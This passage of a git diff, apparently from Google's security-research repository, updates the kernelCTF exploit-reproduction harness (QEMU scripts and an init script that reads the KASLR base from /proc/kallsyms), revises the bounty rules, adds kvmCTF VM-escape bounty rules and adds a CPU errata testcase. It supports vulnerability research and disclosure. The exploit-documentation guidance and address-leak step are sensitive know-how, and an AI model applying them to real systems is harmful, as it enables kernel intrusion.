90%, 50%, or needs to be run 10 times to get the flag once)." + } + } + } + } + } + } +} \ No newline at end of file diff --git a/kernelctf/repro/init/init.sh b/kernelctf/repro/init/init.sh new file mode 100755 index 00000000..ad9b578d --- /dev/null +++ b/kernelctf/repro/init/init.sh @@ -0,0 +1,23 @@ +#!/bin/bash +set -ex +mount -t proc none /proc +mount -t sysfs none /sys + +mkdir /tmp/exp_ro +mount -t 9p exp /tmp/exp_ro + +mkdir /tmp/exp +chown user:user /tmp/exp +chmod a+rx /tmp/exp + +cp /tmp/exp_ro/* /tmp/exp/ +chmod a+rx /tmp/exp/* + +CMD="/tmp/exp/exploit" +if [[ " $* " == *" kaslr_leak=1 "* ]]; then + KASLR_BASE=`head -n 1 /proc/kallsyms | cut -d " " -f1` + CMD="$CMD $KASLR_BASE" +fi + +echo "running exploit, cmd='$CMD', ::EXPLOIT OUTPUT FROM HERE::" +su user -c "$CMD" \ No newline at end of file diff --git a/kernelctf/repro.sh b/kernelctf/repro/repro.sh similarity index 80% rename from kernelctf/repro.sh rename to kernelctf/repro/repro.sh index d8bd12e8..9cd3c2f4 100755 --- a/kernelctf/repro.sh +++ b/kernelctf/repro/repro.sh @@ -16,6 +16,9 @@ touch $QEMU_TXT START_TIME=$(date +%s) +CMDLINE="console=ttyS0 root=/dev/vda1 rootfstype=ext4 rootflags=discard ro init=/init hostname=repro" +if [[ "$(echo $EXPLOIT_INFO | jq -e '.requires_separate_kaslr_leak')" == true ]]; then CMDLINE="$CMDLINE -- kaslr_leak=1"; fi + expect -c ' set timeout -1 set stty_init raw @@ -27,8 +30,9 @@ expect -c ' -nic user,model=virtio-net-pci \ -drive file=rootfs.img,if=virtio,cache=none,aio=native,format=raw,discard=on,readonly=on \ -drive file=flag,if=virtio,format=raw,readonly=on \ - -virtfs local,path=exp,mount_tag=exp,security_model=none \ - -append "console=ttyS0 root=/dev/vda1 rootfstype=ext4 rootflags=discard ro init=/init hostname=repro" \ + -virtfs local,path=init,mount_tag=init,security_model=none,readonly=on \ + -virtfs local,path=exp,mount_tag=exp,security_model=none,readonly=on \ + -append "'"$CMDLINE"'" \ -nographic -no-reboot expect "# " diff --git a/kernelctf/repro_summary.py b/kernelctf/repro_summary.py index bb0b045b..589d2968 100755 --- a/kernelctf/repro_summary.py +++ 
b/kernelctf/repro_summary.py @@ -3,6 +3,7 @@ import json import os import re +from utils import * with open("steps.json", "rt") as f: steps = json.loads(f.read()) @@ -52,7 +53,7 @@ def getLastLine(pattern): if repro_error: result += f"Error during reproduction: `{repro_error}`.\n\n" - expl_out = split('su user -c /tmp/exp/exploit') + expl_out = split('::EXPLOIT OUTPUT FROM HERE::\n') m = re.search(r"exploit.*?: (segfault at.*)", expl_out) if m: @@ -70,9 +71,10 @@ def getLastLine(pattern): """ +result = result.strip() print(result) -if "GITHUB_STEP_SUMMARY" in os.environ: - with open(os.environ["GITHUB_STEP_SUMMARY"], 'at') as f: f.write(result.strip() + "\n") +with open("repro_summary.md", "wt") as f: f.write(result) +ghSet("STEP_SUMMARY", result) os._exit(1 if success_count == 0 else 0) \ No newline at end of file diff --git a/kernelctf/rules.md b/kernelctf/rules.md index 36d0769f..39b82b97 100644 --- a/kernelctf/rules.md +++ b/kernelctf/rules.md @@ -20,26 +20,32 @@ This instance uses the latest LTS (currently 6.1) with [COS kernel config](https * Stability bonus (+$10.000) - * ~~Criteria: 90% of runs successfully steal the flag~~ + * Criteria: 90% of runs successfully steal the flag. - * Currently, all valid submissions receive this bonus (until the infrastructure required to enforcing this requirement is ready) + * More precisely, the [exploit_repro GitHub Action](https://github.com/google/security-research/blob/master/.github/workflows/kernelctf-submission-verification.yaml) reports `Reliability: 90%` or better in the `Reproduction summary` (after a reasonable number of re-runs if needed) + + * If the exploit requires us to provide a KASLR base address, then it is ineligible for the bonus (`requires_separate_kaslr_leak` is true in the `metadata.json` file). + + * Valid submissions with `Flag submission time` older than `2023-09-08T00:00:00Z` on the [public spreadsheet](https://docs.google.com/spreadsheets/d/e/2PACX-1vS1REdTA29OJftst8xN5B5x8iIUcxuK6bXdzF8G1UXCmRtoNsoQ9MbebdRdFnj6qZ0Yd7LwQfvYC2oF/pubhtml) automatically get the bonus. * Reduced attack surface bonus (+$20.000) - * Criteria: Exploit works without using unprivileged user namespaces + * Criteria: Exploit works without using unprivileged user namespaces. - * Note: We may change the bonus definition from time to time (for example adding additional restrictions), but we will announce any changes at least 1 month in advance (see the "Program change notifications and communication" section) + * Note: We may change the bonus definition from time to time (for example adding additional restrictions), but we will announce any changes at least 1 month in advance (see the "Program change notifications and communication" section). * 0-day bonus (+$20.000) - * Criteria: you are exploiting a non-patched, non-disclosed vulnerability (see a more detailed definition in the section "0-day submissions" below) + * Criteria: You are exploiting a non-patched, non-disclosed vulnerability (see a more detailed definition in the section "0-day submissions" below). ### 2. Mitigation bypass (on the mitigation instance) -The mitigation instance is upgraded far less frequently than the LTS instance (currently staying on the base 6.1 commit), thus more 1-day vulnerabilities can be exploited. This way you have more opportunity to present your mitigation bypass techniques. +The mitigation instance is upgraded far less frequently than the LTS instance (currently staying on 6.1.55), thus more 1-day vulnerabilities can be exploited. 
This way you have more opportunity to present your mitigation bypass techniques. Only exploits which clearly bypass [our mitigations](https://github.com/thejh/linux/blob/slub-virtual/MITIGATION_README) are eligible (e.g. if a mitigation protects against UAF, but not against BoF, then an exploit using a BoF vulnerability is not eligible). +As the current instance (`mitigation-v3-6.1.55`) uses the `CONFIG_RANDOM_KMALLOC_CACHES` probabilistic memory allocator hardening, only exploits with at least 70% reliability are eligible (checked the same way as the LTS stability bonus). + #### Reward * $21.000 @@ -151,6 +157,8 @@ In this stage: * Save this exact file, you will need to send us this later. + * Try to keep this file to the minimum necessary; leave out large files such as `vmlinux` and `bzImage`, as they can be downloaded separately if needed. + 2. Submit the flag and the hash via [this form](https://forms.gle/JA3XVBdmSbFmhgZQ9) with the additional details requested. * Save the link as you’ll have to edit this form later. @@ -187,7 +195,7 @@ A submission will not be eligible as a 0-day submission if the vulnerability det * If you'd like to speed up the CVE publication process, please make sure you fill out all the details needed for the CVE when you fill out the form. This way the disclosure happens earlier and your submission will be processed faster. - 4. After the vulnerability is disclosed via a CVE or oss-sec, wait 30 days (recommendation, see notes below) and send us your exploit with the description of the exploitation technique via a PR to https://github.com/google/security-research/ (see required structure below). + 4. After the vulnerability is disclosed via a CVE or oss-sec, wait 30 days (recommendation, see notes below) and send us your exploit with the description of the exploitation technique via a PR to [the security-research repo](https://github.com/google/security-research/) (see required structure below). 5. Make sure that the PR is merged (this is a requirement to get a reward). @@ -257,7 +265,7 @@ The structure of this submission folder should be: * `metadata.json` - * Required, structured metadata information following [this JSON schema (version 2)](metadata.schema.v2.json). + * Required, structured metadata information following [this JSON schema (version 3)](metadata.schema.v3.json). * `docs/vulnerability.md` @@ -372,9 +380,9 @@ If possible, also include how stable your exploit is (e.g. it worked 90% of the ## Program change notifications and communication -We announce major program changes on [Google's Security Blog](https://security.googleblog.com/), but we may change minor, mostly technical details (like steps in the submission process) by changing this page and announcing the change on our [#kernelctf-announcements](https://discord.gg/AjGJ3acF2e) Discord channel. +We announce major program changes on [Google's Security Blog](https://security.googleblog.com/), but we may change minor, mostly technical details (like steps in the submission process) by changing this page and announcing the change on our [#kernelctf-announcements](https://discord.gg/yXue2RwDEA) Discord channel. -If you have any question regarding kernelCTF, feel free to ask on the [#kernelctf](https://discord.gg/A3qZcyaZ69) Discord channel. +If you have any questions regarding kernelCTF, feel free to ask on the [#kernelctf](https://discord.gg/ECS5VnJZys) Discord channel. 
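For illustration, a minimal `metadata.json` that follows the version 3 schema referenced above might look like the sketch below. Every concrete value here (submission ID, CVE, patch commit, affected versions, target, stability note) is a hypothetical placeholder, not a real submission:

```
{
  "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json",
  "submission_ids": ["exp123"],
  "vulnerability": {
    "summary": "example: out-of-bounds write in a networking subsystem (hypothetical)",
    "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=0123456789abcdef0123456789abcdef01234567",
    "cve": "CVE-2023-99999",
    "affected_versions": ["5.15 - 6.1.34"],
    "requirements": {
      "attack_surface": ["userns"],
      "capabilities": ["CAP_NET_ADMIN"],
      "kernel_config": ["CONFIG_NF_TABLES"]
    }
  },
  "exploits": {
    "lts-6.1.31": {
      "uses": ["userns"],
      "requires_separate_kaslr_leak": false,
      "stability_notes": "~90% of runs get the flag"
    }
  }
}
```

The keys of the `exploits` object must match the release IDs you captured flags on (e.g. `lts-6.1.31`); the verification workflow above reads these entries (via its `exploits_info` output) to configure the reproduction runs.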
## Non-kernel vulnerabilities diff --git a/kernelctf/simulator/.gitignore b/kernelctf/simulator/.gitignore new file mode 100644 index 00000000..6890eaed --- /dev/null +++ b/kernelctf/simulator/.gitignore @@ -0,0 +1,5 @@ +releases/ +ramdisk*.img +rootfs*.img +qemu*.sh +flag \ No newline at end of file diff --git a/kernelctf/simulator/local_runner.sh b/kernelctf/simulator/local_runner.sh new file mode 100755 index 00000000..826ca810 --- /dev/null +++ b/kernelctf/simulator/local_runner.sh @@ -0,0 +1,40 @@ +#!/bin/bash +set -e + +usage() { + echo "Usage: $0 <release_name> [--root]"; + exit 1; +} + +INIT_FN="/home/user/run.sh" + +ARGS=() +while [[ $# -gt 0 ]]; do + case $1 in + --root) INIT_FN="/bin/bash"; shift;; + -*|--*) echo "Unknown option $1"; exit 1;; + *) ARGS+=("$1"); shift;; + esac +done +set -- "${ARGS[@]}" + +RELEASE_NAME="$1" +if [ -z "$RELEASE_NAME" ]; then usage; fi + +if [ ! -f "qemu_v2.sh" ]; then wget https://storage.googleapis.com/kernelctf-build/files/qemu_v2.sh; fi +chmod u+x qemu_v2.sh + +if [ ! -d "releases/$RELEASE_NAME" ]; then mkdir -p "releases/$RELEASE_NAME"; fi +if [ ! -f "releases/$RELEASE_NAME/bzImage" ]; then + wget -O "releases/$RELEASE_NAME/bzImage" "https://storage.googleapis.com/kernelctf-build/releases/$RELEASE_NAME/bzImage" +fi + +if [ ! -f "rootfs_v1.img" ]; then + wget https://storage.googleapis.com/kernelctf-build/files/rootfs_v1.img.gz + gzip -d rootfs_v1.img.gz +fi + +if [ ! -f "ramdisk_v1.img" ]; then wget https://storage.googleapis.com/kernelctf-build/files/ramdisk_v1.img; fi +if [ ! -f "flag" ]; then echo "kernelCTF{example_flag}" > flag; fi + +exec ./qemu_v2.sh "releases/$RELEASE_NAME" flag "$INIT_FN" \ No newline at end of file diff --git a/kernelctf/utils.py b/kernelctf/utils.py new file mode 100644 index 00000000..225f6e8d --- /dev/null +++ b/kernelctf/utils.py @@ -0,0 +1,103 @@ +import csv +import io +import json +import os +import subprocess +import re +import requests +import time +from urllib.parse import urlparse + +BASE_DIR = os.path.abspath(os.path.dirname(__file__)) +CACHE_DIR = f"{BASE_DIR}/.cache" + +errors = [] +warnings = [] + +def error(msg): + global errors + msg = msg.replace('\n', '\n ') + errors.append(msg) + print(f"\n[!] [ERROR] {msg}") + +def warning(msg): + global warnings + msg = msg.replace('\n', '\n ') + warnings.append(msg) + print(f"\n[!] [WARN] {msg}") + +def fail(msg): + print("\n[!]
[FAIL] " + msg.replace('\n', '\n ')) + os._exit(1) + +def run(cmd): + try: + result = subprocess.check_output(cmd, shell=True).decode('utf-8').split('\n') + return result if result[-1] != "" else result[0:-1] + except subprocess.CalledProcessError as e: + fail(f"executing '{cmd}' failed with exit code {e.returncode}") + +def subdirEntries(files, subdir): + return list(set([f[len(subdir):].split('/')[0] for f in files if f.startswith(subdir)])) + +def formatList(items, nl=False): + return ('\n' if nl else '').join([f"\n - {item}" for item in items]) + +def printList(title, items): + print(f"\n{title}:" + formatList(items)) + +def errorList(errorMsg, items, warningOnly=False): + itemsStr = ", ".join(f"`{x}`" for x in items) + errorMsg = errorMsg.replace("<LIST>", itemsStr) if "<LIST>" in errorMsg else f"{errorMsg}: {itemsStr}" + if warningOnly: + warning(errorMsg) + else: + error(errorMsg) + +def checkOnlyOne(list, errorMsg): + if len(list) > 1: + errorList(errorMsg, list) + return list[0] + +def checkList(items, isAllowedFunc, errorMsg, warningOnly=False): + disallowedItems = [item for item in items if not isAllowedFunc(item)] + if len(disallowedItems) > 0: + errorList(errorMsg, disallowedItems, warningOnly) + return list(sorted(set(items) - set(disallowedItems))) + +def checkAtLeastOne(list, errorMsg): + if len(list) == 0: + fail(errorMsg) + +def checkRegex(text, pattern, errorMsg): + m = re.match(pattern, text) + if not m: + error(f"{errorMsg}. Must match regex `{pattern}`") + return m + +def fetch(url, cache_name=None, cache_time=3600): + if not cache_name: + cache_name = os.path.basename(urlparse(url).path) + cache_fn = f"{CACHE_DIR}/{cache_name}" + if cache_name and os.path.isfile(cache_fn) and (time.time() - os.path.getmtime(cache_fn) < cache_time): + with open(cache_fn, "rb") as f: return f.read().decode('utf-8') + + response = requests.get(url) + if response.status_code != 200: + fail(f"expected 200 OK for request: {url}") + + if cache_name: + os.makedirs(CACHE_DIR, exist_ok=True) + with open(cache_fn, "wb") as f: f.write(response.content) + + return response.content.decode('utf-8') + +def parseCsv(csvContent): + columns, *rows = list(csv.reader(io.StringIO(csvContent), strict=True)) + return [{ columns[i]: row[i] for i in range(len(columns)) } for row in rows] + +def ghSet(varName, content): + varName = f"GITHUB_{varName}" + print(f"[+] Writing {json.dumps(content)} to ${varName}") + if varName in os.environ: + with open(os.environ[varName], 'at') as f: f.write(content + "\n") diff --git a/kvmctf/metadata.schema.v1.json b/kvmctf/metadata.schema.v1.json new file mode 100644 index 00000000..3e3f1024 --- /dev/null +++ b/kvmctf/metadata.schema.v1.json @@ -0,0 +1,60 @@ +{ + "$id": "https://google.github.io/security-research/kvmctf/metadata.schema.v1.json", + "$schema": "https://json-schema.org/draft/2020-12/schema", + "title": "kvmCTF submission metadata", + "type": "object", + "required": ["$schema", "submission_ids", "vulnerability", "exploits"], + "properties": { + "$schema": { + "const": "https://google.github.io/security-research/kvmctf/metadata.schema.v1.json" + }, + "submission_ids": { + "description": "Identifier(s) of the submission(s).
Can be found on the public kvmCTF spreadsheet (https://docs.google.com/spreadsheets/d/e/2PACX-1vS1REdTA29OJftst8xN5B5x8iIUcxuK6bXdzF8G1UXCmRtoNsoQ9MbebdRdFnj6qZ0Yd7LwQfvYC2oF/pubhtml?gid=2095368189) after a valid flag was submitted via the submission form.", + "type": "array", + "uniqueItems": true, + "items": { + "type": "string", + "pattern": "^exp[0-9]+$" + } + }, + "vulnerability": { + "type": "object", + "required": ["patch_commit", "cve", "affected_versions", "requirements"], + "properties": { + "summary": { + "type": "string", + "description": "Short, one line summary of the vulnerability" + }, + "patch_commit": { + "type": "string", + "pattern": "^https://git.kernel.org/pub/scm/linux/kernel/git/(torvalds|stable)/linux.git/commit/" + }, + "cve": { + "type": "string", + "pattern": "^CVE-[0-9]{4}-[0-9]{4,5}$" + }, + "affected_versions": { + "description": "Linux kernel versions affected by the vulnerability, inclusive range.", + "type": "array", + "uniqueItems": true, + "items": { + "type": "string", + "pattern": "^[0-9]+(\\.[0-9]+)+(-rc[0-9]+)? - [0-9]+(\\.[0-9]+)+(-rc[0-9]+)?$" + } + }, + "syzkaller_reference": { + "pattern": "^https://syzkaller.appspot.com/" + } + } + }, + "exploits": { + "type": "object", + "additionalProperties": false, + "patternProperties": { + "^((lts-[0-9]+.[0-9]+(\\.[0-9]+)?)|(mitigation-[0-9]+\\.[0-9]+(\\.[0-9]+)?)|(cos-[0-9]{2,}-[0-9]+\\.[0-9]+\\.[0-9]+)|extra-.*)$": { + "type": "object" + } + } + } + } +} diff --git a/kvmctf/rules.md b/kvmctf/rules.md new file mode 100644 index 00000000..711e1aae --- /dev/null +++ b/kvmctf/rules.md @@ -0,0 +1,161 @@ +# kvmCTF rules + +kvmCTF is a part of the [Google VRP](https://bughunters.google.com/about/rules/6625378258649088/google-and-alphabet-vulnerability-reward-program-vrp-rules) and is focused on making exploiting Kernel-based Virtual Machine (KVM) vulnerabilities harder by inviting security researchers to demonstrate their exploitation techniques on 0-day and 1-day vulnerabilities on LTS kernel versions. Eventually we might add experimental mitigations to KVM that we would like to see if and how researchers can bypass them. + +We are asking researchers to publish their submissions, helping the community to learn from each other’s techniques. + +# Reward structure and targets + +## Target + +### Exploit for the LTS server +This instance uses the latest LTS kernel version (currently 6.1) with the [COS kernel config](https://cos.googlesource.com/third_party/kernel/+/refs/heads/cos-6.1/arch/x86/configs/lakitu_defconfig) but with `CONFIG_KVM=m`. +The host runs on an Intel(R) Xeon(R) Gold 5222 CPU @ 3.80GHz. \ +Participants will be connected to a Debian 11.7 (bullseye) guest that runs on a `v5.10.0-25` kernel compiled with the default Debian config. \ +The goal is to perform a successful guest-to-host attack. Currently we do not reward QEMU exploits or vulnerabilities. + +#### Rewards +* Full VM Escape: $99,999 +* Arbitrary (host) memory write: $34,999 +* Arbitrary (host) memory read: $24,999 +* Host Denial-of-Service: $14,999 + +Note that the above rewards do not stack. For example if you submit a full VM +escape exploit that uses an arbitrary memory write, you will be compensated with the +reward for the VM escape ($99,999) and not with two separate rewards ($99,999 + +$34,999). + +### Process +To try your exploit on our server you will have to reserve a time slot. You can do it using the command: + +`ssh kvmctf@kvmctf.vrp.ctfcompetition.com` + +and follow the prompts. 
Note that the reservations are done using UTC time, so please convert your desired time to UTC before reserving. You will need to provide an email address and you will be given a key. \ +To connect to the server during your reserved time slot you can use the same command as above. You will be asked to provide the email address you used to reserve the time slot and the key you received. After verification, you will be redirected to the server. + +## Additional eligibility rules +Only the first submission for a vulnerability is eligible for a reward. +If a patch commit fixes multiple vulnerabilities (e.g. by backporting a new version of a component to the stable tree), we assume the root cause is the same and we consider further submissions as duplicates. +If the same vulnerability is fixed in multiple patch commits (e.g. in commit A in the mainline tree and separately in commit B in the stable tree), then we still consider it as the same vulnerability, thus making further submissions duplicates. + +# Submission process +Note: Minor details of the submission process may change from time to time; please make sure you check this page again for updates when you make a new submission. +Submissions can target 0-day and 1-day bugs. +## Non-patched and 0-day submissions +We consider a bug 0-day if at the time of the submission: +* There is no patch commit in the mainline tree, and +* The vulnerability is not disclosed in any form (e.g. there is no Syzkaller report about the bug) + * Note: We may still consider a bug 0-day at our discretion (e.g. although the bug was disclosed by Syzkaller more than 30 days ago, there is no fix and you convince the maintainers to fix the bug) + +If the submission targets a bug which is not patched yet (0-day or 1-day without a patch), then the submission process has one additional initial stage. \ +The purpose of this additional stage is to make sure the vulnerability details are not shared with us before the patch is released but to still provide a 7-day-long “protection window” for 0-day vulnerability finders in case someone else makes a 1-day submission for the same vulnerability before the 0-day finder. \ +In this stage: +1. Exploit the bug and capture the flag from the target environment (the flag is a proof of successful exploitation). +2. Compress the exploit and its source code as a .tar.gz file and calculate its SHA256 checksum. + * Save this exact file, as you will need to send it to us later. + * Try to keep this file to the minimum necessary; leave out large files such as vmlinux and bzImage, as they can be downloaded separately if needed. +3. Submit the flag and the hash via [this form](https://forms.gle/Hu5EuMPieWHRdqXi8) with the additional details requested. + * Save the link as you’ll have to edit this form later. +4. Report the vulnerability to security@kernel.org within 7 days of the first form submission. + * Note: A submission will be considered ineligible if it turns out that this requirement was not respected. +5. Make sure that you are credited in the Reported-By tag of the patch that fixes the bug. + * Use the same email address in the Reported-By tag as you use for the form submission or in the “Email address used in Reported-By tag” field of the form. + * If there is no Reported-By tag on a patch commit, then a 0-day submission is eligible only if this is the first 0-day submission for that patch commit (based on the first stage submission date).
+ * If it is unclear who reported the bug, then the 0-day bonus can be split (multiple reporters), reduced, invalidated or the 0-day submission protection can be lost at our discretion. +6. Wait for the patch to land in a release candidate on the mainline tree (and tagged in Git), or committed on a stable tree. +7. Modify the form within 7 days by following the previously saved link and fill out the extra details as described below in the 1-day section. + * If the 7-day deadline is missed, then the first stage 0-day protection expires and other 1-day submissions can take priority over this submission (which makes this submission a duplicate and thus ineligible for reward). + +A submission will not be eligible as a 0-day submission if the vulnerability details were reported somewhere (e.g. Pwn2Own) other than [security@kernel.org](mailto:security@kernel.org). + +## Already patched, 1-day submissions + +1. Exploit the bug and capture the flag from the target environment (the flag is a proof of successful exploitation). +2. Submit the requested vulnerability details via [this form](https://forms.gle/Hu5EuMPieWHRdqXi8) (without including additional details on the exploitation technique for now). +3. Send us the description of the vulnerability via [bughunters.google.com](https://bughunters.google.com/) (please follow the process described below). +4. Wait for us to publish the CVE or publish the vulnerability details yourself on [oss-sec](https://seclists.org/oss-sec/). + * If you’d like to speed up the CVE publication process, please make sure you fill out all the details needed for the CVE when you fill out the form. This way the disclosure happens earlier and your submission will be processed faster. +5. After the vulnerability is disclosed via a CVE or oss-sec, wait 30 days (recommendation, see notes below) and send us your exploit with the description of the exploitation technique via a PR to https://github.com/google/security-research/ (see required structure below). +6. Make sure that the PR is merged (this is a requirement to get a reward). + +## Note about making the exploit public +You can publish your exploit at any time you would like to, but we recommend publishing the exploit 30 days after the vulnerability was disclosed. This gives the industry time to apply patches. Read our stance on the topic in [Google’s disclosure policy](http://about.google/appsecurity). + +We only process submissions after the exploit is public (and we can only issue rewards when the submission was processed), but not sooner than 30 days after the vulnerability disclosure. + +If you publish sooner than 30 days, you won’t get the reward faster. If you want to delay the publication (disclose later than 30 days), you could do that, but you would get the money later (we want to encourage you to publish the exploit details sooner than later). + +The above is about the exploit itself, not the vulnerability. We automatically share some limited vulnerability details of the submissions on our [public submission spreadsheet](https://docs.google.com/spreadsheets/d/e/2PACX-1vS1REdTA29OJftst8xN5B5x8iIUcxuK6bXdzF8G1UXCmRtoNsoQ9MbebdRdFnj6qZ0Yd7LwQfvYC2oF/pubhtml?gid=2095368189), as a CVE, and as soon as you submit the vulnerability details via the form. 
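As a concrete illustration of the layout described in the next section, a minimal `Makefile` sketch for `exploit/6.1.x/` could look like the following. The compiler flags and the `run` recipe are assumptions for illustration only; in a real submission the `run` target is expected to run the exploit on the live instance (e.g. over the reservation SSH session), not just execute it locally:

```
# Hypothetical minimal Makefile; flags and recipes are placeholders.
exploit: exploit.c
	gcc -static -o exploit exploit.c

run: exploit
	./exploit
```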
+ +## Exploit PR file structure +The submission should be put into the `pocs/linux/kvmctf/<cve>/` folder within the [security-research](https://github.com/google/security-research/) repo, where: +* `<cve>` is the CVE number of the vulnerability in the format `CVE-yyyy-NNNNN` +* If there is a conflicting submission, then append `_2` (or `_3`, etc.) after the directory name. + +For example: `pocs/linux/kvmctf/CVE-2023-1872/`. + +The structure of this submission folder should be: +* `original.tar.gz` + * Required, contains the original exploit. Its hash must match the one submitted initially via the form (this hash cannot be modified later). +* `metadata.json` + * Required, structured metadata information following this [JSON schema (version 1)](https://google.github.io/security-research/kvmctf/metadata.schema.v1.json). +* `docs/vulnerability.md` + * Required, description of the vulnerability. +* `docs/exploit.md` + * Required, description of how the exploits work. If the exploits are too different, the descriptions can also be put next to the exploits. +* `exploit/6.1.x/` + * `exploit.c` + * Required, source code of the exploit. + * `exploit` + * Required, compiled exploit which stole the flag. + * `Makefile` + * Required, includes a target (`exploit`) to compile `exploit.c` into `exploit` and a target (`run`) to run the exploit on the live instance (which steals the flag). + +You can add additional files (e.g. images for writeup or supporting libraries for the exploit). The exploit can be split into multiple files, although we prefer if it is kept as a single `.c` file. +# Documentation requirements +## Vulnerability +If possible, please include the following information in the vulnerability details: +* Commit which introduced the vulnerability +* Commit which fixed the vulnerability +* Affected kernel versions +* Cause (UAF, BoF, race condition, double free, refcount overflow, etc.) +## Exploit +Make sure that the exploit is properly commented and the accompanying exploit.md includes all the details, making it easy to understand what the exploit does. + +Give a step-by-step overview of the exploitation process. When describing the following activities, include them as a separate step: +* Triggering a vulnerability. +* Converting one attack primitive into another. +* Spraying or grooming the heap. +* Leaking host information. +* Overwriting host memory. +* Getting RIP control. +* Executing interesting post-RIP approaches. +* Doing a major step towards successful exploitation which is not listed above. + +In the steps, include the affected objects (e.g. `struct file`), their role (e.g. vulnerable object, victim object), and their respective caches (e.g. `kmalloc-1k`) and the used field members of the object (e.g. getting RIP control via `file->ops->ioctl`, overwriting `msg_msg->security`). + +We expect the following parts to be properly documented: +* Non-trivial constant values should be explained, for example: + * Flag and enumeration values + * Field offsets + * Function addresses + * ROP gadget offsets +* ROP chain items should be explained. + * E.g. in `rop[0] = base + 0x123456;` explain that 0x123456 is resolved to e.g. `call_usermodehelper_exec`. +* Fake structures should be explained; i.e. which structure is created and what fields are set. + * E.g. `data[0x8] = base + 0x123456;` -> data variable contains a fake `struct file`, the field at 0x8 offset is a `f_inode` pointer which is set to ... +* Usage of multi-threading (or forking) + * Why is it needed?
+  * If a race condition is exploited, then which code paths are raced.
+  * Communication and synchronization between the two threads (e.g. what data was sent between the threads, and when the threads wait on each other).
+* Separation between the code parts which are needed to trigger the vulnerability and the parts which belong to the exploitation process (spraying, heap grooming, cross-cache, converting one primitive to another).
+* Any action (e.g. MSR update, hypercall) where a side-effect of the action is used for the exploit rather than its main functionality, for example:
+  * A hypercall used for spraying a specific structure, not for its main purpose.
+  * A change of some MSR value with a non-trivial effect.
+
+If possible, also include how stable your exploit is (e.g. it worked 90% of the time during your testing) and whether your exploit requires a separate kASLR leak (or bruteforce).
+
+# Additional information
+## Program change notifications and communication
+We announce major program changes on [Google’s Security Blog](https://security.googleblog.com/), but we may change minor, mostly technical details (like steps in the submission process) by changing this page and announcing the change on our #kvmctf-announcements Discord channel.
+
+If you have any questions regarding kvmCTF, feel free to ask on the #kvmctf Discord channel.
diff --git a/pocs/cpus/errata/amd/1386/README.md b/pocs/cpus/errata/amd/1386/README.md
index 7e48df00..8cac9349 100644
--- a/pocs/cpus/errata/amd/1386/README.md
+++ b/pocs/cpus/errata/amd/1386/README.md
@@ -79,7 +79,7 @@ The code first writes a fixed value into `ymm0`, then forces a context switch wi
 syscall
 ```
 
-Now we zero `ymm0`, so it's previous value should be permanently lost. The
+Now we zero `ymm0`, so its previous value should be permanently lost. The
 method here is not important, `VZEROALL` or loading some other value are all
 acceptable.
diff --git a/pocs/cpus/errata/amd/genoa-evex-rsp/README.md b/pocs/cpus/errata/amd/genoa-evex-rsp/README.md
new file mode 100644
index 00000000..3d1b0a68
--- /dev/null
+++ b/pocs/cpus/errata/amd/genoa-evex-rsp/README.md
@@ -0,0 +1,86 @@
+# The EVEX.X bit can load the wrong RSP value into vector registers
+

+Tavis Ormandy
+

+
+> *This document is a Work In Progress and represents an errata currently under investigation*
+
+## Introduction
+
+We have observed an error on the AMD Zen 4 family of processors with
+EVEX encoded instructions that access the stack pointer.
+
+The error can be observed with instructions that operate on both vector
+registers and general purpose registers simultaneously, such as `vpinsrw`,
+`vmovq`, `vcvtsi2ss`, and so on.
+
+The error only occurs if you use `RSP` with these instructions.
+
+While it would be a valid but unusual operation to use `RSP` with these
+instructions, we believe it is unlikely that any compiler-generated code is
+affected.
+
+## Details
+
+If you attempt to load the value of `RSP` into a vector register, the value
+actually loaded may lag behind the actual stack pointer.
+
+We have confirmed the bug is reproducible on the following SKU:
+
+- `Family=0x19 Model=0x11 Stepping=0x01 Patch=0xa10113b`
+
+You can verify the current Model, Family, Stepping and Patch level by
+examining `/proc/cpuinfo`.
+
+### Reproducing
+
+The program `zenrsp.c` is the testcase.
+
+It should not produce any output unless an affected core is detected.
+
+#### Building
+
+```
+$ gcc -mavx512vl -o zenrsp zenrsp.c
+```
+
+#### Running
+
+The normal expected output of `zenrsp` should be empty.
+
+On an affected CPU, the output might look like this:
+
+```
+$ ./zenrsp
+after 11125090: 0x697e1d18 vs 0x697e1d20
+after 23257786: 0x697e1d18 vs 0x697e1d20
+after 34307607: 0x697e1d18 vs 0x697e1d20
+after 80446822: 0x697e1d18 vs 0x697e1d20
+after 85419804: 0x697e1d18 vs 0x697e1d20
+after 110056364: 0x697e1d18 vs 0x697e1d20
+after 140417725: 0x697e1d18 vs 0x697e1d20
+after 152543052: 0x697e1d18 vs 0x697e1d20
+after 163199133: 0x697e1d18 vs 0x697e1d20
+after 177559018: 0x697e1d18 vs 0x697e1d20
+```
+
+This indicates that sometimes the wrong value was loaded into a vector register.
+
+### Analysis
+
+The code simply manipulates `rsp` with a `push`/`pop` sequence, then loads
+the stack pointer into `xmm13` with the following instruction:
+
+```
+{evex} vmovq xmm13, rsp
+```
+
+We believe that stack operations are not correctly considered dependencies when
+the EVEX.X bit is set.
+
+This results in stale values occasionally being loaded into registers.
+
+## Conclusion
+
+It is not clear if any code ever loads the stack pointer into vector registers,
+but it is not impossible, and we document it here for reference.
diff --git a/pocs/cpus/errata/amd/genoa-evex-rsp/zenrsp.c b/pocs/cpus/errata/amd/genoa-evex-rsp/zenrsp.c
new file mode 100644
index 00000000..de88db90
--- /dev/null
+++ b/pocs/cpus/errata/amd/genoa-evex-rsp/zenrsp.c
@@ -0,0 +1,60 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <inttypes.h>
+#include <string.h>
+#include <unistd.h>
+#include <immintrin.h>
+
+#define __aligned __attribute__((aligned(32)))
+
+static uint64_t vpinsrw_testcase(uint64_t *correct)
+{
+    uint64_t regstate[2] __aligned = {0};
+    register __m128i r1 asm("xmm13");
+
+    _mm256_zeroall();
+
+    // Record stack pointer so we know the correct value.
+    asm volatile ("mov %%rsp, %0" : "=m"(*correct));
+
+    // Trigger bug
+    asm volatile (".intel_syntax noprefix   \n"
+        // The bug is that these stack operations are ignored by the vmovq.
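+        // The push/pop pair nets out to zero, but it forces in-flight
+        // updates of the stack pointer that the EVEX-encoded vmovq below
+        // can (incorrectly) fail to treat as dependencies.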
+        "push rax           \n" // rsp -= 8
+        "pop rax            \n" // rsp += 8
+        //"{evex} vmovq xmm13, rsp \n"
+        ".byte 0x62         \n" // evex
+        //        RXBR00mm
+        ".byte 0b00110001   \n" // P0
